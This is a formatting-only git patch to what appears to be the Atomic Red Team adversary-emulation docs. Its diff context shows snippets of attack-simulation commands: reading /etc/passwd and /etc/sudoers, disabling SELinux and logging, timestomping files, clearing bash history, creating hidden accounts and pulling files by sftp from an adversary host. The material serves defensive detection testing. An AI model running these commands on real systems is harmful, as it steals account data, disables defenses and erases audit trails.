From 31ccf34c84f6f573a22c4396fed001c08bdb6ded Mon Sep 17 00:00:00 2001
From: Brian Beyer <brian@redcanary.com>
Date: Thu, 10 May 2018 13:51:37 -0600
Subject: [PATCH] how about one slash

---
 atomics/atomic_doc_template.md.erb |  2 +-
 atomics/t1046/t1046.md             |  2 +-
 atomics/t1087/t1087.md             | 10 +++++-----
 atomics/t1089/t1089.md             |  8 ++++----
 atomics/t1099/t1099.md             |  6 +++---
 atomics/t1105/t1105.md             |  2 +-
 atomics/t1123/t1123.md             |  4 ++--
 atomics/t1130/t1130.md             |  2 +-
 atomics/t1136/t1136.md             |  4 ++--
 atomics/t1139/t1139.md             |  2 +-
 atomics/t1146/t1146.md             | 12 ++++++------
 atomics/t1148/t1148.md             |  2 +-
 atomics/t1158/t1158.md             |  2 +-
 atomics/t1176/t1176.md             |  6 +++---
 14 files changed, 32 insertions(+), 32 deletions(-)

diff --git a/atomics/atomic_doc_template.md.erb b/atomics/atomic_doc_template.md.erb
index 27ee6050..d70115fb 100644
--- a/atomics/atomic_doc_template.md.erb
+++ b/atomics/atomic_doc_template.md.erb
@@ -35,5 +35,5 @@ MITRE ATT&CK Technique: [<%= technique['identifier'] %>](https://attack.mitre.or
 ```
 <%- end -%>
 \
-\
+
 <%- end -%>
\ No newline at end of file
diff --git a/atomics/t1046/t1046.md b/atomics/t1046/t1046.md
index 53c922e4..a1a859b7 100644
--- a/atomics/t1046/t1046.md
+++ b/atomics/t1046/t1046.md
@@ -20,4 +20,4 @@ done
 
 ```
 \
-\
+
diff --git a/atomics/t1087/t1087.md b/atomics/t1087/t1087.md
index 09c2670a..48b1167e 100644
--- a/atomics/t1087/t1087.md
+++ b/atomics/t1087/t1087.md
@@ -34,7 +34,7 @@ cat /etc/passwd > #{output_file}
 
 ```
 \
-\
+
 ## Atomic Test #2 - View sudoers access
 xxx (requires root)
 
@@ -52,7 +52,7 @@ cat /etc/sudoers > #{output_file}
 
 ```
 \
-\
+
 ## Atomic Test #3 - View accounts with UID 0
 xxx
 
@@ -70,7 +70,7 @@ grep 'x:0:' /etc/passwd > #{output_file}
 
 ```
 \
-\
+
 ## Atomic Test #4 - List opened files by user
 xxx
 
@@ -83,7 +83,7 @@ username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
 
 ```
 \
-\
+
 ## Atomic Test #5 - Show if a user account has ever logger in remotely
 xxx
 
@@ -96,4 +96,4 @@ lastlog > #{output_file}
 
 ```
 \
-\
+
diff --git a/atomics/t1089/t1089.md b/atomics/t1089/t1089.md
index c03dc36b..4b6a1ad5 100644
--- a/atomics/t1089/t1089.md
+++ b/atomics/t1089/t1089.md
@@ -35,7 +35,7 @@ fi
 
 ```
 \
-\
+
 ## Atomic Test #2 - Disable syslog
 Disables syslog collection
 
@@ -55,7 +55,7 @@ fi
 
 ```
 \
-\
+
 ## Atomic Test #3 - Disable Cb Response
 Disable the Cb Response service
 
@@ -75,7 +75,7 @@ fi
 
 ```
 \
-\
+
 ## Atomic Test #4 - Disable SELinux
 Disables SELinux enforcement
 
@@ -88,4 +88,4 @@ setenforce 0
 
 ```
 \
-\
+
diff --git a/atomics/t1099/t1099.md b/atomics/t1099/t1099.md
index 0d4c28f5..f026c5bf 100644
--- a/atomics/t1099/t1099.md
+++ b/atomics/t1099/t1099.md
@@ -28,7 +28,7 @@ touch -a -t 197001010000.00 #{target_filename}
 
 ```
 \
-\
+
 ## Atomic Test #2 - Set a file's modification timestamp
 Stomps on the modification timestamp of a file
 
@@ -46,7 +46,7 @@ touch -m -t 197001010000.00 #{target_filename}
 
 ```
 \
-\
+
 ## Atomic Test #3 - Set a file's creation timestamp
 Stomps on the create timestamp of a file
 
@@ -71,4 +71,4 @@ stat #{target_filename}
 
 ```
 \
-\
+
diff --git a/atomics/t1105/t1105.md b/atomics/t1105/t1105.md
index 423ef19f..2aacf7eb 100644
--- a/atomics/t1105/t1105.md
+++ b/atomics/t1105/t1105.md
@@ -49,4 +49,4 @@ sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
 
 ```
 \
-\
+
diff --git a/atomics/t1123/t1123.md b/atomics/t1123/t1123.md
index e8a33c0b..3707dbab 100644
--- a/atomics/t1123/t1123.md
+++ b/atomics/t1123/t1123.md
@@ -26,7 +26,7 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
 
 ```
 \
-\
+
 ## Atomic Test #2 - PowerShell Cmdlet via Windows command prompt
 [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
 
@@ -39,4 +39,4 @@ powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
 
 ```
 \
-\
+
diff --git a/atomics/t1130/t1130.md b/atomics/t1130/t1130.md
index b403668f..94ded792 100644
--- a/atomics/t1130/t1130.md
+++ b/atomics/t1130/t1130.md
@@ -26,4 +26,4 @@ fi
 
 ```
 \
-\
+
diff --git a/atomics/t1136/t1136.md b/atomics/t1136/t1136.md
index 5f72d6fc..cfc73ef6 100644
--- a/atomics/t1136/t1136.md
+++ b/atomics/t1136/t1136.md
@@ -26,7 +26,7 @@ useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
 
 ```
 \
-\
+
 ## Atomic Test #2 - Create a user account on a MacOS system
 Creates a user on a MacOS system with dscl
 
@@ -44,4 +44,4 @@ dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
 
 ```
 \
-\
+
diff --git a/atomics/t1139/t1139.md b/atomics/t1139/t1139.md
index 5f8d1612..9113aeef 100644
--- a/atomics/t1139/t1139.md
+++ b/atomics/t1139/t1139.md
@@ -24,4 +24,4 @@ cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
 
 ```
 \
-\
+
diff --git a/atomics/t1146/t1146.md b/atomics/t1146/t1146.md
index 133374f2..8e326194 100644
--- a/atomics/t1146/t1146.md
+++ b/atomics/t1146/t1146.md
@@ -32,7 +32,7 @@ rm ~/.bash_history
 
 ```
 \
-\
+
 ## Atomic Test #2 - Clear Bash history (echo)
 Clears bash history via rm
 
@@ -45,7 +45,7 @@ echo "" > ~/.bash_history
 
 ```
 \
-\
+
 ## Atomic Test #3 - Clear Bash history (cat dev/null)
 Clears bash history via cat /dev/null
 
@@ -58,7 +58,7 @@ cat /dev/null > ~/.bash_history
 
 ```
 \
-\
+
 ## Atomic Test #4 - Clear Bash history (ln dev/null)
 Clears bash history via a symlink to /dev/null
 
@@ -71,7 +71,7 @@ ln -sf /dev/null ~/.bash_history
 
 ```
 \
-\
+
 ## Atomic Test #5 - Clear Bash history (truncate)
 Clears bash history via truncate
 
@@ -84,7 +84,7 @@ truncate -s0 ~/.bash_history
 
 ```
 \
-\
+
 ## Atomic Test #6 - Clear history of a bunch of shells
 Clears the history of a bunch of different shell types by setting the history size to zero
 
@@ -99,4 +99,4 @@ history -c
 
 ```
 \
-\
+
diff --git a/atomics/t1148/t1148.md b/atomics/t1148/t1148.md
index dc88b2ac..d4fa6e8c 100644
--- a/atomics/t1148/t1148.md
+++ b/atomics/t1148/t1148.md
@@ -23,4 +23,4 @@ ls #{evil_command}
 
 ```
 \
-\
+
diff --git a/atomics/t1158/t1158.md b/atomics/t1158/t1158.md
index a5c9783f..ac289d84 100644
--- a/atomics/t1158/t1158.md
+++ b/atomics/t1158/t1158.md
@@ -17,4 +17,4 @@ mkdir .hidden-directory
 echo "this file is hidden" > .hidden-directory/.hidden-file
 ```
 \
-\
+
diff --git a/atomics/t1176/t1176.md b/atomics/t1176/t1176.md
index aab85bde..9fcab409 100644
--- a/atomics/t1176/t1176.md
+++ b/atomics/t1176/t1176.md
@@ -28,7 +28,7 @@ tick 'Developer Mode'.
 
 
 \
-\
+
 ## Atomic Test #2 - Chrome (Chrome Web Store)
 xxx
 
@@ -43,7 +43,7 @@ in Chrome
 
 
 \
-\
+
 ## Atomic Test #3 - Firefox
 Create a file called test.wma, with the duration of 30 seconds
 
@@ -59,4 +59,4 @@ click "Load Temporary Add-on"
 3. Then click 'Open'
 
 \
-\
+